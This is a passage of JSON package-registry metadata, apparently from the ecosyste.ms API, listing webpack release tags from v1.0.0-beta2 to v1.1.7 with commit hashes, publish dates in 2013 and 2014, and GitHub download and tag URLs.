1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2